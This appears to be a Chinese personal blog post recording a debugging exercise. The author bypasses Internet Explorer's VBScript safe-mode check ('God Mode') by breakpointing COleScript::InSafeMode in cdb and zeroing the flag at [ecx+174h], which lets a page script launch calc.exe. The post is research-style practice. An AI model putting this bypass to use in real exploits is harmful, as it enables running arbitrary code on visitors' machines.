注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

且行且记录

点滴记录,行的更远!

 
 
 

日志

 
 

调试一下vbscript脚本弹calc  

2014-08-01 17:28:02|  分类: 一些练习 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

见:How_to_use_VBScript_to_turn_on_the_God_Mode

在editplus编辑器建一个网页并预览,内容如下:

<HTML>
 <HEAD>
  <TITLE> New Document </TITLE>
 </HEAD>
<SCRIPT LANGUAGE="vbscript">
<!--
 Set sh = CreateObject("Shell.Application")
 sh.ShellExecute("calc.exe")
//-->
</SCRIPT>
 <BODY>
 
 </BODY>
</HTML>

网页并没有弹出计算器。

因为如果本机通过vbs脚本,用WScript.exe是可以弹计算器的,里面肯定有控制

运行程序与否的某个标志或者变量。

通过文章所述是InSafeMode里面的一个结构成员。

这里通过调试改变InSafeMode方法里面的一个结构值为零,验证一下弹出计算器。

实际的话要通过某种漏洞内存写入来达到改写为零的目的。。。

 

用cdb附加调试,在如下开头下断点bp vbscript!COleScript::InSafeMode

vbscript!COleScript::InSafeMode:
73276227 8b8174010000    mov     eax,dword ptr  [ecx+174h]
7327622d 83e00b          and     eax,0Bh
73276230 f6d8            neg     al
73276232 1bc0            sbb     eax,eax
73276234 f7d8            neg     eax
73276236 c3              ret

断下后改[ecx+174]为零,再预览即可弹出计算器!

 更方便的话,下个自动断点即可

bp 73276227 "ed @ecx+174 0;g"

  评论这张
 
阅读(81)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017